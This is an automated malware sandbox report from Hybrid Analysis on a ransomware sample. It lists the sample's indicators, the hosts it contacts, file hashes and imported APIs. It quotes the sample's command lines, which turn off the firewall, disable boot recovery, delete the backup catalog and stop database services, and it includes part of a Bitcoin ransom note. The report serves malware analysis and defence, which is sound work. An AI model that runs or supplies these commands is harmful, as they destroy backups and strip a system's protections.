Hiden_pro@aol.com.exe
This report is generated from a file or URL submitted to this webservice on December 14th 2020 12:44:34 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.45.3 © Hybrid Analysis
Incident Response
Risk Assessment
- Ransomware
- Detected indicator that file is ransomware
- Spyware
-
Found a string that may be used as part of an injection method
POSTs files to a webserver - Persistence
-
Modifies firewall settings
Spawns a lot of processes
Tries to suppress failures during boot (often used to hide system changes) - Evasive
-
Found a Wine emulator related string
Possibly tries to implement anti-virtualization techniques
The input sample contains a known anti-VM trick - Network Behavior
- Contacts 2 domains and 3 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 12
-
Anti-Detection/Stealthyness
-
Tries to suppress failures during boot (often used to hide system changes)
- details
- Tries to suppress failures during boot "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process)
- source
- Monitored Target
- relevance
- 8/10
-
Tries to suppress failures during boot (often used to hide system changes)
-
Environment Awareness
-
Found a Wine emulator related string
- details
- "wine_get_version" (Indicator: "wine_get_version"; File: "aa4dd8fe831e364b70b4315620bb99ef894a615e3fcdd089968cbc77f9cb73cc.bin")
- source
- File/Memory
- relevance
- 2/10
-
The input sample contains a known anti-VM trick
- details
- Found VM detection artifact "CPUID trick" in "aa4dd8fe831e364b70b4315620bb99ef894a615e3fcdd089968cbc77f9cb73cc.bin" (Offset: 396323)
- source
- Binary File
- relevance
- 5/10
- ATT&CK ID
- T1497 (Show technique in the MITRE ATT&CK™ matrix)
-
Found a Wine emulator related string
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ET USER_AGENTS SFML User-Agent (libsfml-network) " (SID: 2026914, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected"
Detected alert "ETPRO MALWARE Zeropadypt/Limbo/Ouroboros Ransomware CnC Checkin M4" (SID: 2839873, Rev: 2, Severity: 1) categorized as "Malware Command and Control Activity Detected" (PUA/PUP/Adware) - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 44/67 Antivirus vendors marked sample as malicious (65% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 44/67 Antivirus vendors marked sample as malicious (65% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "78.47.82.133": ...
URL: http://sfml-dev.org/ (AV positives: 1/82 scanned on 12/02/2020 12:46:00)
URL: https://www.sfml-dev.org/files/SFML-2.5.1-windows-vc15-64-bit.zip (AV positives: 1/79 scanned on 09/14/2020 16:17:11)
URL: https://www.sfml-dev.org/files/SFML-2.3.2-windows-gcc-4.9.2-mingw-64-bit.zip (AV positives: 1/79 scanned on 09/05/2020 07:47:17)
URL: https://www.sfml-dev.org/files/SFML-2.5.1-windows-gcc-5.1.0-tdm-32-bit.zip (AV positives: 1/79 scanned on 08/15/2020 18:35:11)
URL: https://www.sfml-dev.org/ (AV positives: 1/79 scanned on 08/15/2020 18:10:44)
File SHA256: 6b34bffbe34da08657b1e1271389e624e28b7b86dfcdf121e04c4d1d33708144 (Date: 12/11/2020 13:42:21)
File SHA256: 4edbf440ba4b005cc2d7b70145e9b8aba4bfb3e5f09027398bf29f4079c8bd6f (Date: 10/30/2020 07:35:55)
File SHA256: 353656c5680f40c92830e435de76140493c33008cbdebbaef373081569b5a906 (Date: 10/30/2020 07:35:33)
File SHA256: 2fc6f345ecc9bad78b38b62f34884ea1522ec47cb90c2973be3314ae8557023c (Date: 10/30/2020 07:35:18)
File SHA256: 5cd6513860a00f0031ed475537a4000e8c1b630c0a6d7b111e566d8caa68ebdf (Date: 10/16/2020 22:49:59)
File SHA256: 901f6c65affe93f8ab395464e666e7619fefd8901e4861cda85f7cb333c093cc (AV positives: 1/74 scanned on 05/31/2020 20:25:44)
File SHA256: 9e40e72c9cb277b535d5944fbe3dbbd0a5f34aba1d4d7d0e309ffcbfc5c3e1c3 (AV positives: 8/74 scanned on 05/13/2020 03:43:04)
Found malicious artifacts related to "104.23.99.190": ...
URL: http://pastebin.com/raw/ry1jacf3 (AV positives: 1/83 scanned on 12/14/2020 10:07:09)
URL: http://pastebin.com/raw/ZM6QyknC (AV positives: 5/84 scanned on 12/14/2020 10:01:03)
URL: http://pastebin.com/raw/3vsJLpWu (AV positives: 5/84 scanned on 12/14/2020 09:59:29)
URL: http://pastebin.com/raw/8DEsZn2y (AV positives: 3/84 scanned on 12/14/2020 09:58:14)
URL: http://pastebin.com/raw/E4MB4MFj (AV positives: 4/84 scanned on 12/14/2020 09:56:41)
File SHA256: 45cdf3d6142467e0059c906996fd3c6d1b038c2affebd54fc5e079d597400236 (AV positives: 5/76 scanned on 12/14/2020 00:32:24)
File SHA256: f2b08cbd1324428f7f623f9fde528ecd25880ecf1a0d48e7ed49bf3e5801eef8 (Date: 12/14/2020 12:36:40)
File SHA256: c981366934ef62383ebabb3c6bf1336717a7d9158488f3993190412db4fae15f (Date: 12/14/2020 10:26:47)
File SHA256: b48480ac54499cc566f1e1c33104948455cf43e70c0d4e23ea5020bc3a059784 (Date: 12/14/2020 10:20:50)
File SHA256: b28fceb2d93f8638dadc2e088632558818b2875b13db6d020a7ae8e49f09b1b9 (Date: 12/14/2020 10:19:16)
File SHA256: f9c5acf218decfafdafbdcac8fa1b5246538d0b2c4ba78d54ba9ac98fe3aa73d (Date: 12/14/2020 10:13:09)
File SHA256: a32e8ed78e0693cc0be76707cb494ae62c2a61bd2562ceaec776417af3479d9e (AV positives: 27/76 scanned on 12/13/2020 19:08:18)
File SHA256: cbd9cd5c428646c9f6d1bec79fd7196a16331d0fa3fce9493ad889562824b210 (AV positives: 29/76 scanned on 12/12/2020 07:45:25)
File SHA256: 5684fa5e0b0aad1e253dca7cc71b6d5092731d29887a22d65546d84d170dc5e7 (AV positives: 2/75 scanned on 12/10/2020 13:15:03)
File SHA256: 8e022f51fa84a28a56b8c5208787019da5b4c0f56d4bf110e78710b988c1511b (AV positives: 5/74 scanned on 12/10/2020 12:25:02)
File SHA256: 86c748fd3e05765f3c578523aae17b761bbaba2d1eeb511dc2c047987f182a2c (Date: 11/23/2020 21:20:06)
File SHA256: 465900f04ec84c8863b3146bdf1bd730294db81d (Date: 11/23/2020 21:20:06)
File SHA256: d3a7538d6b4cb5d7c83aa6c651c9650a (Date: 11/23/2020 21:20:06) - source
- Network Traffic
- relevance
- 10/10
-
Multiple malicious artifacts seen in the context of different hosts
- details
-
Found malicious artifacts related to "78.47.82.133": ...
URL: http://sfml-dev.org/ (AV positives: 1/82 scanned on 12/02/2020 12:46:00)
URL: https://www.sfml-dev.org/files/SFML-2.5.1-windows-vc15-64-bit.zip (AV positives: 1/79 scanned on 09/14/2020 16:17:11)
URL: https://www.sfml-dev.org/files/SFML-2.3.2-windows-gcc-4.9.2-mingw-64-bit.zip (AV positives: 1/79 scanned on 09/05/2020 07:47:17)
URL: https://www.sfml-dev.org/files/SFML-2.5.1-windows-gcc-5.1.0-tdm-32-bit.zip (AV positives: 1/79 scanned on 08/15/2020 18:35:11)
URL: https://www.sfml-dev.org/ (AV positives: 1/79 scanned on 08/15/2020 18:10:44)
File SHA256: 6b34bffbe34da08657b1e1271389e624e28b7b86dfcdf121e04c4d1d33708144 (Date: 12/11/2020 13:42:21)
File SHA256: 4edbf440ba4b005cc2d7b70145e9b8aba4bfb3e5f09027398bf29f4079c8bd6f (Date: 10/30/2020 07:35:55)
File SHA256: 353656c5680f40c92830e435de76140493c33008cbdebbaef373081569b5a906 (Date: 10/30/2020 07:35:33)
File SHA256: 2fc6f345ecc9bad78b38b62f34884ea1522ec47cb90c2973be3314ae8557023c (Date: 10/30/2020 07:35:18)
File SHA256: 5cd6513860a00f0031ed475537a4000e8c1b630c0a6d7b111e566d8caa68ebdf (Date: 10/16/2020 22:49:59)
File SHA256: 901f6c65affe93f8ab395464e666e7619fefd8901e4861cda85f7cb333c093cc (AV positives: 1/74 scanned on 05/31/2020 20:25:44)
File SHA256: 9e40e72c9cb277b535d5944fbe3dbbd0a5f34aba1d4d7d0e309ffcbfc5c3e1c3 (AV positives: 8/74 scanned on 05/13/2020 03:43:04)
Found malicious artifacts related to "104.23.99.190": ...
URL: http://pastebin.com/raw/ry1jacf3 (AV positives: 1/83 scanned on 12/14/2020 10:07:09)
URL: http://pastebin.com/raw/ZM6QyknC (AV positives: 5/84 scanned on 12/14/2020 10:01:03)
URL: http://pastebin.com/raw/3vsJLpWu (AV positives: 5/84 scanned on 12/14/2020 09:59:29)
URL: http://pastebin.com/raw/8DEsZn2y (AV positives: 3/84 scanned on 12/14/2020 09:58:14)
URL: http://pastebin.com/raw/E4MB4MFj (AV positives: 4/84 scanned on 12/14/2020 09:56:41)
File SHA256: 45cdf3d6142467e0059c906996fd3c6d1b038c2affebd54fc5e079d597400236 (AV positives: 5/76 scanned on 12/14/2020 00:32:24)
File SHA256: f2b08cbd1324428f7f623f9fde528ecd25880ecf1a0d48e7ed49bf3e5801eef8 (Date: 12/14/2020 12:36:40)
File SHA256: c981366934ef62383ebabb3c6bf1336717a7d9158488f3993190412db4fae15f (Date: 12/14/2020 10:26:47)
File SHA256: b48480ac54499cc566f1e1c33104948455cf43e70c0d4e23ea5020bc3a059784 (Date: 12/14/2020 10:20:50)
File SHA256: b28fceb2d93f8638dadc2e088632558818b2875b13db6d020a7ae8e49f09b1b9 (Date: 12/14/2020 10:19:16)
File SHA256: f9c5acf218decfafdafbdcac8fa1b5246538d0b2c4ba78d54ba9ac98fe3aa73d (Date: 12/14/2020 10:13:09)
File SHA256: a32e8ed78e0693cc0be76707cb494ae62c2a61bd2562ceaec776417af3479d9e (AV positives: 27/76 scanned on 12/13/2020 19:08:18)
File SHA256: cbd9cd5c428646c9f6d1bec79fd7196a16331d0fa3fce9493ad889562824b210 (AV positives: 29/76 scanned on 12/12/2020 07:45:25)
File SHA256: 5684fa5e0b0aad1e253dca7cc71b6d5092731d29887a22d65546d84d170dc5e7 (AV positives: 2/75 scanned on 12/10/2020 13:15:03)
File SHA256: 8e022f51fa84a28a56b8c5208787019da5b4c0f56d4bf110e78710b988c1511b (AV positives: 5/74 scanned on 12/10/2020 12:25:02)
File SHA256: 86c748fd3e05765f3c578523aae17b761bbaba2d1eeb511dc2c047987f182a2c (Date: 11/23/2020 21:20:06)
File SHA256: 465900f04ec84c8863b3146bdf1bd730294db81d (Date: 11/23/2020 21:20:06)
File SHA256: d3a7538d6b4cb5d7c83aa6c651c9650a (Date: 11/23/2020 21:20:06) - source
- Network Traffic
- relevance
- 10/10
-
Uses network protocols on unusual ports
- details
- TCP traffic to 94.130.46.250 on port 8080
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1065 (Show technique in the MITRE ATT&CK™ matrix)
-
Malicious artifacts seen in the context of a contacted host
-
System Security
-
Modifies firewall settings
- details
-
Process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off" (Show Process)
Process "netsh.exe" with commandline "netsh firewall set opmode mode=disable" (Show Process) - source
- Monitored Target
- relevance
- 8/10
- ATT&CK ID
- T1089 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies firewall settings
-
Unusual Characteristics
-
Spawns a lot of processes
- details
-
Spawned process "Hiden_pro@aol.com.exe" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC" (Show Process)
Spawned process "net.exe" with commandline "net stop MSDTC" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLSERVERAGENT" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop vds" (Show Process)
Spawned process "net.exe" with commandline "net stop vds" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop vds" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off" (Show Process)
Spawned process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable" (Show Process)
Spawned process "netsh.exe" with commandline "netsh firewall set opmode mode=disable" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLWriter" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLWriter" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLBrowser" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLBrowser" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLBrowser" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQL$CONTOSO1" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Spawns a lot of processes
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 18
-
Environment Awareness
-
Possibly tries to implement anti-virtualization techniques
- details
- ";r;s99t3Qua3@uES^`F`yj$_F\d|9~duFd9uFdu9uFdd9uFdS9uFdB9uFd19uFd 9uFd9uFdvdjY~dqaY^`[3_^]UQQEMUS]VuW3;tuE Ej"Xf9u3j"Xtffftuf;Etf;Eut3fB}3]f9f;Etf;Euf9tuEuj\EXCf9tj"Xf9j\Xu;u%tj"_f9y}u" (Indicator: "qemu")
- source
- File/Memory
- relevance
- 4/10
- ATT&CK ID
- T1497 (Show technique in the MITRE ATT&CK™ matrix)
-
Possibly tries to implement anti-virtualization techniques
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ETPRO POLICY External IP Address Lookup via libsfml-network" (SID: 2838021, Rev: 1, Severity: 2) categorized as "Device Retrieving External IP Address Detected"
Detected alert "ETPRO INFO HTTP Request with Lowercase connection Header Observed" (SID: 2838131, Rev: 1, Severity: 2) categorized as "Potentially Bad Traffic" - source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
1/82 reputation engines marked "http://sfml-dev.org" as malicious (1% detection rate)
1/83 reputation engines marked "http://example.com" as malicious (1% detection rate) - source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
POSTs files to a webserver
- details
-
"POST /1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C HTTP/1.1
connection: close
content-length: 1716
content-type: application/x-www-form-urlencoded
from: me
host: 94.130.46.250
user-agent: libsfml-network/2.x" with no payload - source
- Network Traffic
- relevance
- 5/10
-
POSTs files to a webserver
-
Installation/Persistence
-
Writes data to a remote process
- details
-
"cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\SysWOW64\net.exe" (Handle: 128)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\net.exe" (Handle: 128)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\net.exe" (Handle: 128)
"cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\net.exe" (Handle: 128)
"net.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\net1.exe" (Handle: 144)
"net.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\net1.exe" (Handle: 144)
"net.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\net1.exe" (Handle: 144)
"net.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\net1.exe" (Handle: 144)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\netsh.exe" (Handle: 128)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\netsh.exe" (Handle: 128)
"cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\netsh.exe" (Handle: 128)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\netsh.exe" (Handle: 128) - source
- API Call
- relevance
- 6/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Writes data to a remote process
-
Network Related
-
Found potential IP address in binary/memory
- details
-
"255.255.255.255"
Heuristic match: "127.0.0.1/"
"2.5.29.17"
Heuristic match: "1.3.14.3.2.26"
"2.5.29.18"
"2.5.29.19"
Heuristic match: "2.16.840.1.101.3.4.2.4"
Heuristic match: "2.16.840.1.101.3.4.2.1"
Heuristic match: "2.16.840.1.101.3.4.2.2"
Heuristic match: "2.16.840.1.101.3.4.2.3"
"78.47.82.133"
"94.130.46.250" - source
- File/Memory
- relevance
- 3/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 78.47.82.133 on port 80 is sent without HTTP header
TCP traffic to 104.23.99.190 on port 443 is sent without HTTP header
TCP traffic to 94.130.46.250 on port 8080 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
- ATT&CK ID
- T1043 (Show technique in the MITRE ATT&CK™ matrix)
-
Found potential IP address in binary/memory
-
Ransomware/Banking
-
Detected indicator that file is ransomware
- details
- "d-color: #cd5b5b; width: 900px; font-size: 15pt; font-family: Arial; font-weight: bolder; border-radius: 10px; } #img{ display: block; width: 100px; height: 100px; text-align: center; margin:0 auto; } </style> <title>lock</title></head><body><img src='https://www.iconsdb.com/icons/preview/red/lock-xxl.png' id='img' ><h1 id='h1'> !!! Your Files Has Been Encrypted !!!</h1><div id='d1'> ♦ your files has been locked with highest secure cryptography algorithm ♦ <br> ♦ there is no way to decrypt your files without paying and buying Decryption tool♦ <br>♦ but after 48 hour decryption price will be double♦ <br>♦ you can send some little files for decryption test♦<br> ♦ test file should not contain valuable data♦<br> ♦ after payment you will get decryption tool ( payment Should be with Bitcoin" (Source: aa4dd8fe831e364b70b4315620bb99ef894a615e3fcdd089968cbc77f9cb73cc.bin, Indicator: "decrypt your files")
- source
- File/Memory
- relevance
- 7/10
-
The input sample dropped very many files
- details
- The input sample dropped 1064 files (often an indicator for ransomware)
- source
- Binary File
- relevance
- 5/10
-
Detected indicator that file is ransomware
-
System Security
-
Stops a system service using net.exe
- details
-
Process "net.exe" with commandline "net stop MSDTC" (Service: "Distributed Transaction Coordinator", UID: 00064948-00001108)
Process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process)
Process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Process "net.exe" with commandline "net stop vds" (Service: "Virtual Disk", UID: 00065071-00003084)
Process "net.exe" with commandline "net stop SQLWriter" (Show Process)
Process "net.exe" with commandline "net stop SQLBrowser" (Service: "Computer Browser", UID: 00065330-00000452)
Process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Process "net.exe" with commandline "net stop MSSQL$CONTOSO1" (Show Process) - source
- Monitored Target
- relevance
- 10/10
-
Stops a system service using net.exe
-
Unusual Characteristics
-
Imports suspicious APIs
- details
-
CryptEncrypt
GetDriveTypeW
GetDriveTypeA
FindFirstFileW
UnhandledExceptionFilter
WriteFile
GetModuleFileNameW
IsDebuggerPresent
GetModuleFileNameA
LoadLibraryA
LoadLibraryExW
CreateThread
TerminateProcess
GetModuleHandleExW
SleepEx
CreateToolhelp32Snapshot
Process32First
LoadLibraryW
GetVersionExW
GetTickCount
VirtualProtect
ExitThread
Process32Next
OpenProcess
GetStartupInfoW
CreateDirectoryW
DeleteFileW
GetFileSizeEx
FindFirstFileExA
FindNextFileW
FindNextFileA
FindFirstFileExW
GetProcAddress
CreateFileW
CreateFileA
GetCommandLineW
GetCommandLineA
GetModuleHandleA
GetModuleHandleW
GetFileAttributesExW
CreateProcessA
Sleep
VirtualAlloc
accept
WSAStartup
connect
recv
send
listen
closesocket
socket
bind
recvfrom
sendto - source
- Static Parser
- relevance
- 1/10
-
Installs hooks/patches the running process
- details
-
"Hiden_pro@aol.com.exe" wrote bytes "c0dfdc771cf9db77ccf8db770d64dd7700000000c011047700000000fc3e047700000000e0130477000000009457537725e0dc77c6e0dc7700000000bc6a527700000000cf3104770000000093195377000000002c32047700000000" to virtual address "0x75741000" (part of module "NSI.DLL")
"Hiden_pro@aol.com.exe" wrote bytes "711141027a3b4002ab8b02007f950200fc8c0200729602006cc805001ecd3d027d263d02" to virtual address "0x75A107E4" (part of module "USER32.DLL")
"Hiden_pro@aol.com.exe" wrote bytes "7d07e07781edde77ae86dd77c6e0dc77effddf772d16de776014e077478ddd77a8e2dc776089dd7700000000ad376b778b2d6b77b6416b7700000000" to virtual address "0x742D1000" (part of module "WSHTCPIP.DLL")
"Hiden_pro@aol.com.exe" wrote bytes "0efcdf7781edde77ae86dd77c6e0dc77effddf772d16de77c0fcdb77da8fe6776014e077478ddd77a8e2dc776089dd7700000000ad376b778b2d6b77b6416b7700000000" to virtual address "0x742E1000" (part of module "WSHIP6.DLL")
"cmd.exe" wrote bytes "711141027a3b4002ab8b02007f950200fc8c0200729602006cc805001ecd3d027d263d02" to virtual address "0x75A107E4" (part of module "USER32.DLL")
"net.exe" wrote bytes "c0dfdc771cf9db77ccf8db770d64dd7700000000c011047700000000fc3e047700000000e0130477000000009457537725e0dc77c6e0dc7700000000bc6a527700000000cf3104770000000093195377000000002c32047700000000" to virtual address "0x75741000" (part of module "NSI.DLL")
"net1.exe" wrote bytes "c0dfdc771cf9db77ccf8db770d64dd7700000000c011047700000000fc3e047700000000e0130477000000009457537725e0dc77c6e0dc7700000000bc6a527700000000cf3104770000000093195377000000002c32047700000000" to virtual address "0x75741000" (part of module "NSI.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Imports suspicious APIs
-
Hiding 6 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 19
-
Environment Awareness
-
Reads the active computer name
- details
-
"net1.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"netsh.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME") - source
- Registry Access
- relevance
- 5/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the cryptographic machine GUID
- details
- "netsh.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the active computer name
-
General
-
Contacts domains
- details
-
"pastebin.com"
"www.sfml-dev.org" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"78.47.82.133:80"
"104.23.99.190:443"
"94.130.46.250:8080" - source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
-
"%USERPROFILE%\source\repos\curl\Release\curl.pdb"
"JkBJBJ<B/SvcWideCharToMultiByte failed for: IsEULA_Accepted...iDisableCheckEULAIsEULA_Accepted Check disabled, returning 1\AdobeViewerEULA not yet acceptedEULAAcceptedForBrowserEULA accepted from 1EULA accepted from 2%s_Classes\VirtualStore\MACHINE\EULA accepted from 3IsVistaOrLater returns 1IsVistaOrLater returns 0IsXP returns 1kernel32.dllntdllRtlGetVersionRtlGetVersion failed, using GetVersionExProgramW6432PROCESSOR_ARCHITECTUREAMD64%d%d%c%dCheckSystemRequirements os,sp = %d %d osString = %s, physicalMemory (%d) = %dCheckSystemRequirements failed. Required MinOS: CheckSystemRequirements failed. Required MaxOS: CheckSystemRequirements failed. Required MinServicePack: CheckSystemRequirements failed. Required MinMemory: EnableLUAUAC is enabledUAC is disabled or not registeredSystem context install not allowed, will not update Std user with UAC offStdUserUacOffupgradeexitstduseruacoffMustElevate...already elevatedrequired to elevatenot required to elevate\Adobe\ARM\1.0\AdobeARM.exeSHGetFolderPath in GetCurrentExePath failed: \Adobe\ARM\1.0\SHGetFolderPath in GetLauncherPath failed: Not found or not valid: GetFileVersion(): File version: %1!u!.%2!u!.%3!u!.%4!u!VerQueryValue() failed in GetFileVersion().GetFileVersionInfo() failed in GetFileVersion().GetFileVersionInfoSize() failed in GetFileVersion().%1!u!.%2!u!.%3!u!.%4!u!IsNewArmAvailable...AdobeARM.exe version is not validIsNewArmAvailable: Major version is newer, returning 1.IsNewArmAvailable: Minor version is newer, returning 1.IsNewArmAvailable: Build number is newer, returning 1.IsNewArmAvailable: Revision number is newer, returning 1.IsNewArmAvailable: ARM version is up to date, returning 0.FindCurrentPDFOwner....pdf.pdf - no value.pdf value: AcroExch.DocumentAcroExch.Document.7\shellAcroExch.Document.7\shell - no valueReadAcroExch.Document.7\shell\Read\commandOpenAcroExch.Document.7\shell\Open\commandAcrobat.Document.\shell\Open\commandAcroExch.Document.\shell\Read\commandUnknown ProgID value in .pdfUnable to get file path "%1"File not found: AcroRd32.exeAcrobat.exeIsPatchingDisabled...Software\Policies\Microsoft\Windows\InstallerDisablePatchDisablePatch is set in HKLM\DisableLUAPatchingDisableLUAPatching is set in HKLM\GetPreferences...SOFTWARE\Policies\Adobe\Acrobat Reader\Adobe Acrobat\\FeatureLockdown.0\FeatureLockdownFeatureLockDown set to disable Updater.Using CommandLine preference AUTO_DOWNLOADAUTO_ALLAUTO_CHECK_UPDATESUsing registered preference AUTO_OFFpreferences not provided with command line and not registered - using default AUTO_DOWNLOADRegisterResult...Empty applicationtLastError_iInstallTime_tLastT_IsTimeElapsed...iDisableLastIsTimeElapsed Check disabled, returning 1Minutes elapsed: IsLongTimeNoUpdates...iIntervalLongTimeNoUpdates check is disabled, returning 0Unable to get base check in IsLongTimeNoUpdates, returning 0Days elapsed: Current time is less than registered timeLast check for updates is not positive: Last check for updates is registered but emptyLast check for updates decryption failedLast check for updates is not registeredRegisterError...IsErrorExpired...iDisableErrorCheckError check disabledRegistered Error data invalidRegistered Error Version invalidRegistered Error data irrelevant - Product Version has changedRegistered Error expiredRegistered Error not expiredRegistered Error time not validLast error is not registeredCanDelayUpdate...update release date cannot be usedupdate release time is newer than current timeno delay limit set, can delaydelay limit not reached, can delaydelay limit reachedRegisterPromptForUpgrade...iLastPromptForUpgradeiPromptForUpgradeIntervaltPromptedUpgradeNameiForcedUpgradeUserNotifiedIsPromptForUpgradeTimeElapsed...iDisablePromptForUpgradeCheck for Upgrade was found disabledUpgrade check forced, skipping last prompt validationiInstallTime_ReaderNew Upgrade is available, will prompt User: iDoNotRemindSkippedIsElapsed...Registered time expiredRegistered time not expiredRegistered time not valid not registeredGetDaysRemaning...Days remaining: iTestDaysRemainingFound and will use Days Remaining registered: iNotifyCountUpdate_Ready_Notify_CountiNotifyRebootCountReboot_Pending_Notify_CountRegisterWaitForFilesInUse: empty applicationTotal wait for the files in use: tTimeWaitedFilesInUse_GetTimeWaitedForFilesInUse: empty applicationvalue is registered but not valid: value is not registered ms available, waited Network isNetwork is notWaitForMsiMutex...WaitMsiMutex is over the limitexiting WaitMsiMutex on Application requestOpenSCManager failed in IsMsiBusy: MSIServerOpenService failed in IsMsiBusy: QueryServiceStatusEx failed in IsMsiBusy: Global\_MSIExecuteRepairInstalledArm...SYSTEM\CurrentControlSet\Control\Session ManagerPendingFileRenameOperationswill not repair, found pending rebootfound installed: successfully reinstalled: failed to reinstall: Service_Not_Allowed_ReasonNot Admin and SYSTEM context update is not allowed - will not use ServiceUAC is off and SYSTEM context update is not allowed - will not use ServiceLast Service failure not expired - Service is not allowediLoggedSvcErrorCodeService_Access_ErrorService error reported: Will not report already reported Service errorNotify service to create ShMOpenSCManager failedAdobeARMserviceOpenService failedQueryServiceStatusEx failedService is stopped or about to stopWaiting for Service to runQueryServiceStatusEx failed Service wait timed outService notify successService Manager reported error: Service success, time elapsed: Service error :*?Global\PdfOnershipInProcessEventpdf ownership takeover in process, will not cleanup ArmUI.ini fileCleanupEx...elevated, will not cleanupValidateSingleInstallFiles...Signature Validation failed for: ValidateSingleInstallFiles returns 0 file size for: ValidateSingleInstallFiles returns TRUE for: SELECT Value FROM Property WHERE 